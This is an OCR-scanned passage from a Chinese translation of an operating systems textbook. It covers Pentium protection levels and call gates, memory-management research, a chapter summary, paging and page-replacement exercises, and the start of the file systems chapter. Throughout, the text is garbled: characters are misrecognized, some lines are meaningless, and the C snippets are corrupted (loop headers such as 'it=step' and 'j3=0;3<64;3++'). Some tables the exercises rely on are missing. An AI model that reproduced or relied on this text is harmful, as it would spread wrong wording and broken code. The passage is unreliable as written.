单独 的 、 分 页 的 32 位 地 址 空间 ， 这 样 的 模式 是 可 以 做 到 的 。 这 时 ， 所 有 
的 段 寄存 器 可 以 用 同一 个 选择 子 设置 ， 其 描述 符 中 基 址 设 为 0%， 段 长 度 
被 设置 为 最 大 。 指 令 侦 移 量 会 是 线性 地 址 ， 只 使 用 了 一 个 地 址 空间 一 一 
效果 上 就 是 正常 的 分 页 。 事 实 上 ， 上 所 有 当前 的 Pentium 操 作 系统 都 是 这 
样 工作 的 。OS/2 是 惟一 一 个 使 用 Intel MMU 体 系 结构 所 有 功能 的 操作 系 
统 。 


不 管 怎么 说 ， 我 们 不 得 不 称赞 Pentium 处 理 器 的 设计 者 ， 因 为 他 们 


面 对 的 是 互相 冲突 的 目标 ， 实 现 纯 的 分 页 、 纯 的 分 段 和 上 段 页 式 管 理 ， 同 
时 还 要 与 286 羔 容 ， 而 他 们 高 效 地 实现 了 所 有 的 目标 ， 最 终 的 设计 非 第 
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尽管 我 们 已 经 简单 地 讨论 了 Pentium 处 理 器 虚拟 内 存 的 全 部 体系 机 
制 ， 关 于 保护 我 们 还 是 值得 再 说 几 负 的， 因为 它 和 虚拟 内 存 联系 很 紧 
密 。 和 虚拟 内 存 一 样 ，Pentium 处 理 器 的 保护 系统 与 MULTICS 很 类 似 。 
它 文 持 4 个 保护 级 ，0 级 权限 最 高 ，3 级 最 低 ， 如 图 3-43 所 示 。 在 任何 时 
刻 ， 运 行程 序 都 处 在 由 PSW 中 的 两 位 域 所 指出 的 茶 个 保护 级 上 ， 系 统 中 
的 每 个 段 也 有 一 个 级 别 。 





ZAS 
下 






保护 级 的 
典型 应 用 


系统 调用 


级 


图 3-43 Pentium 的 保护 机 制 





当 程 序 只 使 用 与 它 同 级 的 段 时 ， 一 切 都 会 很 正常 。 对 更 高 级 别 数据 
的 存 取 是 允许 的 ， 但 是 对 更 低级 别 的 数据 的 存 取 是 非法 的 并 会 引起 陷 
阱 。 调 用 不 同 级 别 《〈 更 高 或 更 低 ) 的 过 程 是 允许 的 ， 但 是 要 通过 一 种 被 
严格 控制 的 方式 来 进行 。 为 执行 越级 调用 ，CALL 指 令 必须 包含 一 个 选 
择 子 而 不 单 时 是 一 个 地 址 。 选 择 子 指 疝 一 个 称 为 调用 门 Call gate) 的 
描述 符 ， 由 它 给 出 被 调用 过 程 的 地 址 。 因 此 ， 要 跳 转 到 任何 一 个 不 同 级 
别 的 代码 段 的 中 间 都 是 不 可 能 的 ， 只 有 正式 指定 的 入 口 点 可 以 使 用 。 保 
护 级 和 调用 门 的 概念 来 自 MULTICS， 在 那里 它们 被 称 为 保护 环 


(protection ring) 。 





这 个 机 制 的 一 种 典型 的 应 用 如 图 3-43 所 示 。 在 0 级 是 操作 系统 内 
核 ， 处 理 WO、 存 储 管理 和 其 他 关键 的 操作 。 在 1 级 是 系统 调用 处理 程 
序 ， 用 户 程 序 可 以 通过 调用 这 里 的 过 程 执行 系统 调用 ,但 是 只 有 一 些 特 
定 的 和 受 保护 的 过 程 可 以 被 调用 。 在 2 级 是 库 过 程 ， 它 可 能 是 由 很 多 正 
在 运行 的 程序 共享 的 。 用 户 程序 可 以 调用 这 些 过 程 ， 读 取 和 它们 的 数据 ， 
但 是 不 能 修改 它们 。 最 后 ， 运 行 在 3 级 上 的 用 户 程 序 受到 的 保护 最 少 。 











陷阱 和 中 断 使 用 了 一 种 和 调用 门类 似 的 机 制 。 它 们 访问 的 也 征 描述 
符 而 不 是 绝对 地 址 ， 而 且 这 些 描述 符 指 同 将 被 执行 的 特定 的 过 程 。 图 3- 
40 中 的 Type 域 用 于 区 别 代码 段 、 数 据 段 和 各 种 类 型 的 门 。 


3.8 ”有关 存 储 管理 的 研究 


存储 管理 ， 特 别 是 页 面 置换 算法 ， 兽 经 是 一 个 成 果 丰 硕 的 研究 领 
域 ， 但 这 些 成 果 中 大 部 分 好 像 已 经 销声匿迹 了 ， 至 少 对 通用 系统 来 说 是 
这 样 的 。 很 多 实时 系统 试图 使 用 时 钟 算法 的 某 些 变 体 ， 因 为 它 容易 实现 
而 且 相 对 高 效 。 但 最 近 有 了 一 个 例外 ， 这 就 是 对 4.4 BSD 中 虚拟 内 存 的 
重新 设计 (Cranor 和 Parulkar，1999) 。 








现在 仍 有 一 些 关 于 新 式 系 统 的 分 页 研究 在 进行 。 例 如 ， 手 机 和 PDA 
已 成 为 小 型 的 个 人 电脑 ， 其 中 很 多 将 RAM 分 页 到 “磁盘 ”上 ， 所 不 同 的 是 
手机 的 磁盘 是 闪存 ， 和 旋转 磁性 盘 相 比 有 不 同 的 特性 。 据 Park 等 人 
(2004b) 报道 (In 等 人 ，2007; Joo 等 人 ，2006; Part 等 人 ，2004a) 。 
Part A (2004b) 近期 的 一 些 工作 还 着 眼 于 针对 移动 设备 的 能 源 敏 感 型 
的 需求 分 页 技术 。 


关于 分 页 性 能 的 研究 也 在 进行 (Albers 等 人 ，2002;Burton 和 Kelly， 
2003;Cascaval 等 人 ， 2005;Panagiotou 和 Souza，2006;Peserico，2003) 。 
研究 的 兴趣 还 包括 对 多 媒体 系统 (Dasigenis 等 人 ，2001;Hand，1999) 
和 实时 系统 (Pizlo 和 Vitek，2006) 的 存储 器 管理 。 
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本 章 中 我 们 考察 了 存储 管理 。 我 们 看 到 在 最 简单 的 系统 中 是 根本 没 
有 任何 交换 或 分 页 的 。 一 旦 一 个 程序 装 入 内 存 ， 筷 将 一 直 在 内 存 中 运行 
直到 完成 。 一 些 操作 系统 在 同一 时 刻 只 允许 一 个 进程 在 内 存 中 运行 ， 而 
为 一 些 操作 系统 支持 多 道 程序 设计 。 














接 下 来 是 交换 技术 。 系 统 通 过 交换 技术 可 以 同时 运行 总 内 存 占用 超 
过 物理 内 存 大 小 的 多 个 进程 ， 如 果 一 个 进程 没有 内 存 空间 可 用 ， 它 将 会 
被 换 到 磁盘 上 。 和 内 存 和 磁盘 上 的 空闲 空间 可 以 使 用 位 图 或 空 采 区 列表 来 
记录 。 








现代 计算 机 都 有 茶 种 形式 的 虚拟 内 存 。 在 最 简单 的 形式 中 ， 每 一 个 
进程 的 地 址 空间 被 划分 为 同等 大 小 的 块 ， 称 为 页 面 ， 页 面 可 以 被 放 入 内 
存 中 任何 可 用 的 页 框 内 。 有 多 种 页 面 置 换算 法 ， 其 中 两 个 比较 好 的 算法 
是 老化 算法 和 工作 集 时 钟 算法 。 





为 了 使 分 页 系统 工作 恨 好 ， 仅 选择 算法 是 不 够 的 ， 还 要 关注 诸如 工 
作 集 的 确定 、 存 储 器 分 配 策略 以 及 所 需要 的 页 面 大 小 等 问题 。 





分 段 可 以 帮助 处 理 在 执行 过 程 中 大 小 有 变化 的 数据 结构 ， 并 能 简化 
连接 和 共 孚 。 分 段 还 有 利于 为 不 同 的 段 提 供 不 同 的 保护 。 有 时 ， 可 以 把 
分 段 和 分 页 结合 起 来 ， 以 提供 一 种 二 维 的 虚拟 内 存 。MULTICS 系 统 以 


> 


及 Intel Pentium 都 是 这 样 既 文 持 分 段 也 文 持 分 页 的 系统 。 


习题 


1. 在 图 3-3 中 基 址 和 界限 寄存 器 含有 相同 的 值 16 384， 这 是 巧合 ， 还 
是 它们 总 是 相等 ? 如 果 这 只 是 巧合 ， 为 什么 在 这 个 例子 里 它们 是 相等 


的 ? 





2. 交 换 系统 通过 紧缩 来 消除 空间 区 。 假 设 有 很 多 空 闪 区 和 数据 段 随 
机 分 布 ， 并 且 读 或 写 32 位 长 的 字 需 要 10ns 的 时 间 ， 紧 缩 128MB 大 概 需要 
多 长 时 间 ? 为 了 简单 起 见 ， 假 设 空 几 区 中 含有 字 0， 内 存 中 最 高 地 址 处 
含有 有 效 数据 。 








3. 请 比较 用 位 图 和 链表 两 种 方法 来 记录 空闲 内 存 所 需 的 存储 空间 。 
128MB 的 内 存 以 n 字 节 为 单元 分 配 ， 对 于 链表 ， 假 设 内 存 中 数据 段 和 空 
闲 区 交 蔡 排列 ， 长 度 均 为 64KB。 并 假设 链表 中 的 每 个 结 点 需要 32 位 的 
内 存 地 址 、16 位 长 度 和 16 位 下 一 结 点 域 。 这 两 种 方法 分 别 需 要 多 少 字 节 
的 存储 空间 ? 哪 种 方法 更 好 ? 








4. 在 一 个 交换 系统 中 ， 按 内 存 地 址 排列 的 空闲 区 大 小 是 : 10KB、 
4KB、20KB、18KB、7KB、9KB、12KB 和 15KB。 对 于 连续 的 段 请 
求 : a)12KB; b)10KB; cj9KB。 使 用 首次 适 配 算法 ， 将 找 出 哪个 空闲 
K? 使 用 最 佳 适 配 、 最 差 适 配 、 下 次 适 配 算法 呢 ? 





5. 对 下 面 的 每 个 十 进 制 虚拟 地 址 ， 分 别 使 用 4KB 页 面 和 8KB 页 面 计 








算 虚 拟 页 号 和 偏 移 量 : 20000, 32768, 60000. 


6.Intel 8086 处 理 器 不 支持 虚拟 内 存 ， 然 而 一 些 公 司 曾 经 设计 过 包含 
未 作 任 何 改 动 的 8086 CPU 的 分 页 系统 。 猜 想 一 下 ， 他 们 是 如 何 做 到 这 一 
点 的 。 提 示 : 考虑 MMU 的 逻辑 位 置 。 


7. 考 虑 下 面 的 C 程 序 : 


int X[N]; 
int step=M;//M 是 某 个 预定 义 的 常量 
for(int i=0;i<N;it=step) X[i]=X[i]+1; 

















a) 如 果 这 个 程序 运行 在 一 个 页 面 大 小 为 4KB 且 有 64 个 TLB 表 项 的 机 
器 上 时 ，M 和 N 取 什么 值 会 使 得 内 层 循环 的 每 次 执行 都 会 引起 TLB 失 
效 ? 








pb) 如果 循 环 重复 很 多 过 ， 结 果 会 和 a) 的 答案 相同 吗 ? 请 解释 。 





8. 存 储 页 面 必须 可 用 的 磁盘 空间 和 下 列 因素 有 关 : 最 大 进程 数 n， 
虚拟 地 址 空间 的 字 节 数 v，RAM 的 字 节 数 r。 给 出 最 坏 情况 下 磁盘 空间 需 
求 的 表达 式 。 这 个 数量 的 真实 性 如 何 ? 











9. 一 个 机 器 有 32 位 地 址 空间 和 8KB 页 面 ， 页 表 完 全 用 硬件 实现 ， 页 
表 的 每 一 表 项 为 一 个 32 位 字 。 进 程 局 动 时 ， 以 每 个 字 100ns 的 速度 将 页 
表 从 内 存 复制 到 硬件 中 。 如 果 每 个 进程 运行 100 ms《〈 包 含 装 入 页 表 的 时 
间 ) ， 用 来 装 入 页 表 的 CPU 时 间 的 比例 是 多 少 ? 





10. 假 设 一 个 机 器 有 48 位 的 虚拟 地 址 和 32 位 的 物理 地 址 。 





a) 假 设 页 面 大 小 是 4KB， 如 果 只 有 一 级 页 表 ， 那 么 在 页 表 里 有 多 少 


页 表 项 ? 请 解释 。 


b) 假 设 同一 系统 有 32 个 TLB 表 项 ， 并 且 假 设 一 个 程序 的 指令 正好 能 
放 入 一 个 页 ， 并 且 该 程序 顺序 地 从 有 数 千 个 页 的 数组 中 读 取 长 整 型 元 
素 。 在 这 种 情况 下 TLB 的 效果 如 何 ? 





11. 假 设 一 个 机 器 有 38 位 的 虚拟 地 址 和 32 位 的 物理 地 址 。 
a) 与 一 级 页 表 比 较 ， 多 级 页 表 的 主要 优点 是 什么 ? 


bp) 一 个 有 16KB 个 页 、4 字 节 表 项 的 二 级 页 表 ， 应 该 对 第 一 级 页 表 域 
分 配 多 少 位 ， 对 第 二 级 页 表 域 分 配 多 少 位 ? 请 解释 原因 。 





12. 一 个 32 位 地 址 的 计算 机 使 用 两 级 页 表 。 虚 拟 地 址 被 分 成 9 位 的 顶 
级 页 表 域 、11 位 的 二 级 页 表 域 和 一 个 偏 移 量 ， 页 面 大 小 是 多 少 ? 在 地 址 
空间 中 一 共有 多 少 个 页 面 ? 











13. 假 设 一 个 32 位 虚拟 地 址 被 分 成 a、b、c、d 四 个 域 。 前 三 个 域 用 于 
一 个 三 级 页 表 系 统 ， 第 四 个 域 4 是 侦 移 量 。 页 面 数 与 这 四 个 域 的 大 小 都 
ARRE? 如 果 不 是 ， 与 哪些 因素 有 关 以 及 与 哪些 因素 无 天 ? 








14. 一 个 计算 机 使 用 32 位 的 虚拟 地 址 ，4KB 大 小 的 页 面 。 程 序 和 数据 





都 位 于 最 低 的 页 面 〈0 一 4095) ， 挫 栈 位 于 最 高 的 页 面 。 如 果 使 用 传统 
(一 级 ) 分 页 ， 页 表 中 需要 多 少 个 表 项 ”如果 使 用 两 级 分 页 ， 每 部 分 有 


10 位 ， 需 要 多 少 个 页 表 项 ? 








15. 一 台 计 算 机 的 进程 在 其 地 址 空间 有 1024 个 页 面 ， 页 表 保 存在 内 
存 中 。 从 页 表 中 读 取 一 个 字 的 开销 是 5ns。 为 了 减 小 这 一 开销 ， 该 计算 
机 使 用 了 TLB， 它 有 32 个 (虚拟 页 面 ， 物 理 页 框 ) 对 ， 能 在 1ns 内 完成 
查找 。 请 问 把 平均 开销 降 到 2ns 需 要 的 命中 率 是 多 少 ? 


16.VAX 机 中 的 TLB 中 没有 包含 R 人 位， 为什么? 


17.TLB 需 要 的 相 联 存储 设备 如 何 用 便 件 实现 ， 这 种 设计 对 扩展 性 意 
RETA? 


18. 一 台 机 器 有 48 位 虚拟 地 址 和 32 位 物理 地 址 ， 页 面 大 小 是 8KB， 试 


问 页 表 中 需要 多 少 个 表 项 ? 





19. 一 个 计算 机 的 页 面 大 小 为 8KB， 内 存 大 小 为 256KB， 虚 拟 地 址 空 
则 为 64GB， 使 用 倒 排 页 表 实现 虚拟 内 存 。 为 了 保证 平均 散 列 链 的 长 度 
小 于 1， 散 列表 应 该 多 大 ? 假设 散 列 表 的 大 小 为 2 的 震 。 





20. 一 个 学 生 在 编译 需 设 计 谍 程 中 同 教 授 提 议 了 一 个 项 目 : 编写 一 
个 编译 器 ， 用 来 产生 页 面 访问 列表 ， 该 列表 可 以 用 于 实现 最 优 页 面 置换 
GHA. Wee AA HE? ATA? 有 什么 方法 可 以 改进 运行 时 的 分 页 效 











率 ? 


21. 假 设 虚 拟 页 码 索 引流 中 有 一 些 长 的 页 码 索 引 序列 的 重复 ， 序 列 
之 后 有 时 会 是 一 个 随机 的 页 码 索 引 。 例 如 ， 序 列 0，1，.…，511，431， 
0，1，.…，511，332，0，1，.… 中 就 包含 了 0，1，.…，511 的 重复 ， 以 及 
跟随 在 它们 之 后 的 随机 页 码 索引 431 和 332。 


al 在 工作 负载 比 该 序列 短 的 情况 下 ， 标 准 的 页 面 置换 算法 (LRU, 
FIFO, Clock) 在 处 理 换 页 时 为 什么 效果 不 好 ? 


b) 如 果 一 个 程序 分 配 了 500 个 页 框 ， 请 摘 述 一 个 效果 优 于 LRU、 
FIFO 或 Clock 算 法 的 页 面 置换 方法 。 


22. 如 果 将 FIFO 页 面 置换 算法 用 到 4 个 页 框 和 8 个 页 面 上 ， 若 初始 时 
页 框 为 室 ， 访 问 字符 串 为 0172327103， 请 问 会 发 生 多 少 次 缺 页 中 断 ? 如 
果 使 用 LRU 算 法 呢 ? 





23. 考 虑 图 3-15b 中 的 页 面 序 列 。 假 设 从 页 面 B 到 页 面 A 的 R 位 分 别 是 
11011011。 使 用 第 二 次 机 会 算法 ， 被 移 走 的 是 哪个 页 面 ? 


24. 一 台 小 计算 机 有 4 个 页 框 。 在 第 一 个 时 钟 滴答 时 R 位 是 0111 (页 
面 0 是 0， 其 他 页 面 是 1) ， 在 随后 的 时 钟 滴答 中 这 个 值 是 1011、1010、 
1101、0010、1010、1100、0001。 如 果 使 用 带 有 8 位 计数 器 的 老化 算 
法 ， 给 出 最 后 一 个 滴答 后 4 个 计数 器 的 值 。 


25. 请 给 出 一 个 页 面 访问 序列 ， 其 第 一 个 被 选择 置换 的 页 面 必须 不 
同 于 Clock 和 LRU 算 法。 假设 一 个 进程 分 配 了 3 个 页 框 ， 访 问 串 中 的 页 号 
属于 集合 0，1，2，3。 





26. 在 图 3-21c 的 工作 集 时 钟 算法 中 ， 表 针 指 癌 那 个 R=0 的 页 面 。 如 
果 T=400， 这 个 页 面 将 被 移出 吗 ? 如果 t=1000 呢 ? 





27. 把 一 个 64KB 的 程序 从 平均 寻 道 时 间 10ms、 旋 转 延 迟 时 间 10ms、 
每 磁道 32KB 的 磁盘 上 装 入 ， 对 于 下 列 页 面 大 小 分 别 需要 多 少时 间 ? 





a) 页 面 大 小 为 2KB。 


b) 页 面 大 小 为 4KB。 





假设 页 面 随机 地 分 布 在 磁盘 上 ， 柱 面 的 数目 非常 大 以 至 于 两 个 页 面 
在 同一 个 柱 面 的 机 会 可 以 忽略 不 计 。 





28. 一 个 计算 机 有 4 个 页 框 ， 装 入 时 间 、 上 次 访问 时 间 和 每 个 页 的 R 
位 和 M 位 如 下 所 示 《 时 间 以 时 钟 滴答 为 单位 ) : 





a)NRU 算 法 将 置换 哪个 页 面 ? 
b)FIFO 算 法 将 置换 哪个 页 面 ? 
OLRU 算 法 将 置换 哪个 页 面 ? 
d) 第 二 次 机 会 算法 将 置换 哪个 页 面 ? 


29. 有 二 维 数组 : 





int X[64] [64]; 











假设 系统 中 有 4 个 页 框 ， 每 个 页 框 大 小 为 128 个 字 〔 一 个 整数 占用 一 
SF) 。 处 理 数 组 X 的 程序 正好 可 以 放 在 一 页 中 ， 而 且 总 是 占用 0 写 
页 。 数 据 会 在 其 他 3 个 页 框 中 被 换 入 或 换 出 。 数 组 Xx 为 按 行 存储 〈 即 ， 
在 内 存 中 ，X[0][0] 之 后 是 X[0][1]) 。 下 面 两 段 代码 中 ， 哪 一 个 会 有 最 少 
的 缺 页 中 断 ? 请 解释 原因 ， 并 计算 缺 页 中 断 的 总 数 。 





AR: 
































BEX: 











for(int 1=0;i<64;i++) 
for(int j3=0;3<64;3++)X[i] [[j]=0; 


























30.PDP-1 是 最 早 的 分 时 计算 机 之 一 ， 有 4K 个 18 位 字 的 内 存 。 在 每 个 
时 刻 它 在 内 存 中 保持 一 个 进程 。 当 调度 程序 决定 运行 男 一 个 进程 时 ， 将 
内 存 中 的 进程 写 到 一 个 换 页 磁 鼓 上 ， 磁 鼓 的 表面 有 4K 个 18 位 字 。 磁 鼓 
可 以 从 任何 字 开 始 读 写 ， 而 不 仅仅 是 字 0。 请 解释 为 什么 要 选 这 个 磁 


six? 





31. 一 台 计 算 机 为 每 个 进程 提供 65 536 字 节 的 地 址 空间 ， 这 个 地 址 空 
间 补 划分 为 4096 字 市 的 页 面 。 一 个 特定 的 程序 有 327 68 字 节 的 正文 、16 
386 字 节 的 数据 和 15 870 字 节 的 堆栈 。 这 个 程序 能 装 入 这 个 地 址 空间 
吗 ? 如 果 页 面 大 小 是 512 字 节 ， 能 放 得 下 吗 ? 记 住 一 个 页 面 不 能 同时 包 
含 两 个 不 同 段 的 成 分 。 





32. 一 个 页 面 同一 时 刻 可 能 在 两 个 工作 集中 吗 ? 请 解释 原因 。 








33. 人 们 已 经 观察 到 在 两 次 缺 页 中 断 之 间 执 行 的 指令 数 与 分 配给 程 
序 的 页 框 数 直接 成 比例 。 如 果 可 用 内 存 加 倍 ， 缺 页 中 断 间 的 平均 间隔 也 
加 倍 。 假 设 一 条 普通 指令 需要 1hs， 但 是 如 采 发 生 了 缺 页 中 断 惑 需要 
2001hs《 即 2ms 处 理 缺 页 中 断 ) 。 如 采 一 个 程序 运行 了 60s， 期 间 发 生 了 
15 000 次 缺 页 中 断 ， 如 果 可 用 内 存 是 原来 的 两 倍 ， 那 么 这 个 程序 运行 需 
要 多 少时 间 ? 














34.Frugal 计 算 机 公司 的 一 组 操作 系统 设计 人 员 正 在 考虑 在 他 们 的 新 
操作 系统 中 减少 对 后 备 存储 数量 的 需求 。 老 板 建议 根本 不 要 把 程序 正文 





保存 在 交换 区 中 ， 而 是 在 需要 的 时 候 直 接 从 二 进 制 文 件 中 调 页 进来 。 在 
什么 条 件 下 《如 果 有 这 样 的 条 件 话 ) 这 种 想法 适用 于 程序 文本 ? 在 什么 
条 件 下 《如 果 有 这 样 的 条 件 话 ) 这 种 想法 适用 于 数据 ? 


35. 有 一 条 机 器 语言 指令 将 要 被 调 入 ， 该 指令 可 把 一 个 32 位 字 装 入 
含有 32 位 字 地 址 的 寄存 硕 。 这 个 指令 可 能 引起 的 最 大 缺 页 中 断 次 数 是 多 





>? 


36. 像 在 MULTICS 中 那样 ， 当 同时 使 用 分 段 和 分 页 时 ， 首 先 必须 查 
找 段 描述 符 ， 然 后 是 页 描述 符 。TLB 也 是 这 样 按 两 级 查找 的 方式 工作 的 
吗 ? 





37. 一 个 程序 中 有 两 个 段 ， 段 0 中 为 指令 ， 段 1 中 为 读 / 写 数据 。 段 0 有 
读 / 执 行 保护 ， 段 1 有 读 / 写 保护 。 内 存 是 请 求 分 页 式 虚 拟 内 存 系 统 ， 它 的 
虚拟 地 址 为 4 位 页 号 ，10 位 偏 移 量 。 页 表 和 保护 如 下 所 示 〈( 表 中 的 数字 
均 为 十 进 制 ) : 

















对 于 下 面 的 每 种 情形 ， 或 者 给 出 动态 地 址 所 对 应 的 实 《〈 实 际 ) AE 
地 址 ， 或 者 指出 发 生 了 哪 种 失效 《〈“ 缺 页 中 断 ， 或 保护 错误 ) 。 


a) 读 取 页 : 段 1， 页 1， 偏 移 3; 
b) 存 储 页 : 段 0"， 页 0， 偏 移 16; 
o 读 取 页 : 段 1， 页 4， 偏 移 28; 
d) 跳 转 到 : E1, W3, (m32. 


38. 你 能 想象 在 哪些 情况 下 支持 虚拟 内 存 是 个 坏 想法 吗 ? 不 支持 虚 
拟 内 存 能 得 到 什么 好 处 呢 ? 请 解释 。 


39. 构 造 一 个 柱状 图 ， 计 算 你 的 计算 机 中 可 执行 二 进 制 文 件 大 小 的 


平均 值 和 中 间 值 。 在 Windows 系 统 中 ， 观 察 所 有 的 .exe 和 .dl 文件 ;在 

UNIX 系 统 中 ， 观 察 /bin、/usr/bin、/local/bin 目 录 下 的 所 有 非 脚本 文件 的 
可 执行 文件 (或 者 使 用 包 e 工 具 来 查找 所 有 的 可 执行 文件 ) 。 确 定 这 台 
机 器 的 最 优 页 面 大 小 ， 只 考虑 代码 〈 不 包括 数据 ) 。 考 虑 内 部 碎片 和 页 
表 大 小 ， 对 页 表 项 的 大 小 做 出 合理 的 假设 。 假 设 所 有 的 程序 被 执行 的 可 
能 性 相同 ， 所 以 可 以 同等 对 符 。 














40.MS-DOS 中 的 小 程序 可 以 编译 成 .COM 文 件 。 这 些 文件 总 是 装载 
到 0x100 地 址 的 一 个 内 存 段 ， 这 个 内 存 段 用 作 代码 、 数 据 和 堆栈 。 转 移 
执行 的 控制 指令 (如 JMP、CALL) 和 访问 静态 数据 的 指令 把 地 址 编译 
进 目标 代码 中 。 写 一 个 程序 重 定 癌 这 个 程序 文件 ， 使 之 可 以 在 任意 开始 
地 址 处 运行 。 读 者 的 程序 必须 扫描 代码 ， 寻 找 指 回回 定 内 存 地 址 的 目标 
代码 ， 然 后 在 重 定 同 范围 内 修改 那些 指 癌 内 存单 元 的 地 址 。 可 以 在 汇编 
语言 程序 正文 中 找到 这 些 目标 地 址 。 注 意 ， 要 想 不 借 助 于 额外 的 信息 就 
出 色 完 成 这 项 工作 通常 是 不 可 能 的 ， 因 为 有 些 数 据 字 的 值 和 指令 目标 代 
码 相 仿 。 





41. 编 写 一 个 程序 ， 它 使 用 老化 算法 模拟 一 个 分 页 系统 。 页 框 的 数 
是 参数 。 页 面 访问 序列 从 文件 中 读 取 。 对 于 一 个 给 定 的 输入 文件 ， 列 
出 每 1000 个 内 存 访问 中 发 生 缺 页 中 断 的 数目 ， 它 是 可 用 页 框 数 的 函数 。 


E. 
里 . 


42. 编 写 一 个 程序 ， 说 明 TLB 失 效 对 有 效 内 存 存 取 时 间 的 影响 ， 内 存 
存 取 时 间 可 以 用 计算 每 次 吉 历 大 数组 时 的 读 取 时 间 来 衡量 。 





al 解释 纺 程 思想 ， 并 描述 所 期 望 输出 如 何 展 示 一 些 实际 的 虚拟 内 存 
体系 结构 。 


bp) 运行 该 程序 ， 并 解释 运行 结果 与 你 的 预期 有 何 出 入 。 


c 在 一 台 更 古老 的 且 有 着 不 同体 系 结构 的 计算 机 上 重复 b)， 并 解释 
输出 上 的 区 别 。 


43. 编 写 一 个 程序 ， 该 程序 能 说 明 当 有 两 个 进程 的 简单 情况 下 ， 使 
用 局 部 页 置换 策略 和 全 局 页 置换 策略 的 差异 。 读 者 将 会 用 到 能 生成 一 个 
基于 统计 模型 的 页 面 访问 串 的 例 程 。 这 个 模型 有 N 个 状态 ， 从 0 到 N-1， 
代表 每 个 可 能 的 页 面 访问 ， 每 个 状态 i 相 关 的 概率 pi 代表 下 一 次 访问 仍 
指 问 同一 页 面 的 几率 。 人 否则 ， 下 一 次 页 面 访问 将 以 等 概率 指 同 其 他 任何 


一 个 页 面 。 








说 明 当 N 比 较 小 时 ， 页 面 访 问 串 生成 例 程 能 运行 正常 。 


b) 对 有 一 个 进程 和 固定 数量 的 页 框 的 情况 计算 缺 页 中 断 率 。 解 释 这 
种 结果 为 什么 是 正确 的 。 


对 有 独立 页 面 访问 序列 的 两 个 进程 ， 以 及 是 b) 中 页 框 数 两 倍 的 页 
框 ， 重 复 b)。 


BAE ”文件 系统 


所 有 的 计算 机 应 用 程序 都 需要 存储 和 检索 信息 。 进 程 运行 时 ， 可 以 
在 它 目 己 的 地 址 空间 存储 一 定量 的 信息 ， 但 存储 容量 受 虚 拟 地 址 空间 大 
小 的 限制 。 对 于 某 些 应 用 程序 ， 它 自己 的 地 址 空间 已 经 足够 用 了 ; 但 是 
对 于 其 他 一 些 应 用 程序 ， 例 如 航空 订 标 系统、 银行 系统 或 者 公司 记 账 系 
统 ， 这 些 存 储 空 间 又 显得 太 小 了 。 








在 进程 的 地 址 空间 上 保存 信息 的 第 二 个 问题 是 : 进程 终止 时 ， 它 保 
存 的 信息 也 随 之 丢失 。 对 于 很 多 应 用 (如 数据 库 ) 而 言 ， 有 关 信 息 必须 
能 保存 几 星期 、 几 个 月 ， 甚 至 永久 保留 。 在 使 用 信息 的 进程 终止 时 ， 这 
些 信息 是 不 可 以 消失 的 ， 甚 至 ， 即 使 是 系统 朋 溃 致使 进程 消亡 了 ， 
言 恩 也 应 该 保存 下 来 。 











第 三 个 问题 是 : 经 常 需要 多 个 进程 同时 存 取 同 一 信息 (或 者 其 中 部 
息 ) 。 如 果 只 在 一 个 进程 的 地 址 空间 里 保存 在 线 电 话 夭 ， 那 么 只 有 
该 进程 才 可 以 对 它 进行 存 取 ， 也 就 是 说 一 次 只 能 查找 一 个 电话 号码 。 解 
决 这 个 问题 的 方法 是 使 信息 本 里 独立 于 任何 一 个 进程 。 











因此 ， 长 期 存储 信息 有 三 个 基本 要 求 : 








1) 能 够 存储 大 量 信息 。 


2) 使 用 信息 的 进程 终止 时 ， 信 息 仍旧 存在 。 





3) 必 须 能 使 多 个 进程 并 发 存 取 有 关 信 息 。 


What (magnetic disk〉 由 于 其 长 期 存储 的 性 质 ， 己 经 有 多 年 的 使 用 
历史 。 和 磁带 与 光盘 虽然 也 在 使 用 ， 但 它们 的 性 能 很 低 。 我 们 将 在 第 5 章 
学 习 更 多 有 关 磁 盘 的 知识 ， 但 目前 我 们 可 以 先 把 磁盘 当 作 一 种 固定 块 大 
小 的 线性 序列 ， 并 且 支 持 如 下 两 种 操作 : 


1) 读 块 k; 


2) 5 Rk. 





SESE FEE SC REE BRE, (ERA SPREE, JR Eat ey 
以 解决 长 期 存储 的 问题 。 








不 过 ， 这 里 存在 着 很 多 不 便于 实现 的 操作 ， 特 别 是 在 有 很 多 程序 或 
者 多 用 户 使 用 着 的 大 型 系统 上 《如 服务 器 ) 。 在 这 种 情况 下 ， 很 容易 产 
生 一 些 问题 ， 例 如 : 








1) 如 何 找 到 信息 ? 
2) 如 何 防止 一 个 用 户 读 取 另 一 个 用 尸 的 数据 ? 


3) 如 何 知道 哪些 块 是 空 闻 的 ? 


就 像 我 们 看 到 的 操作 系统 提取 处 理 器 的 概念 来 建立 进程 的 抽象 ， 以 
及 提取 物理 存储 器 的 概念 来 建立 进程 《虚拟 ) 地 址 空间 的 抽象 那样 ， 我 
们 可 以 用 一 个 新 的 抽象 一 一 文件 来 解决 这 个 问题 。 进 程 (与 线程 》、 地 
址 空间 和 文件 ， 这 些 抽象 概念 均 是 操作 系统 中 最 重要 的 概念 。 如 果真 正 
深入 理解 了 这 三 个 概念 ， 那 么 读者 吏 迈 上 了 成 为 一 个 操作 系统 专家 的 道 
路 。 





文件 是 进程 创建 的 信息 逻辑 单元 。 一 个 磁盘 一 般 含 有 几 干 甚至 几 百 
万 个 文件 ， 每 个 文件 是 独立 于 其 他 文件 的 。 文 件 不 仅仅 被 用 来 对 磁盘 建 
模 ， 以 蔡 代 对 随机 存储 器 CRAM) 的 建 模 ， 事 实 上 ， 如 果 能 把 每 个 文 
件 看 成 一 种 地 址 空间 ， 那 么 读者 就 离 理解 文件 的 本 质 不 远 了 。 








进程 可 以 读 取 已 经 存在 的 文件 ， 并 在 需要 时 建立 新 的 文件 。 存 储 在 
文件 中 的 信息 必须 是 持久 的 ， 也 就 是 说 ， 不 会 因为 进程 的 创建 与 终止 而 
受到 影响 。 一 个 文件 应 只 在 其 所 有 者 明确 删除 它 的 情况 下 才 会 消失 。 尽 
管 读 写 文件 是 最 常见 的 操作 ， 但 还 存在 着 很 多 其 他 操作 ， 其 中 的 一 些 我 
们 将 在 下 面 加 以 介绍 。 








文件 是 受 操作 系统 管理 的 。 有 关 文 件 的 构造 、 命 名 、 存 取 、 使 用 、 
保护 、 实 现 和 管理 方法 都 是 操作 系统 设计 的 主要 内 容 。 从 总 体 上 看 ， 操 
作 系 统 中 人 处理 文件 的 部 分 称 为 文件 系统 (file system) ， 这 就 是 本 章 的 


论题 。 


从 用 户 角度 来 看 ， 文 件 系统 中 最 重要 的 是 它 在 用 户 眼 中 的 表现 形 

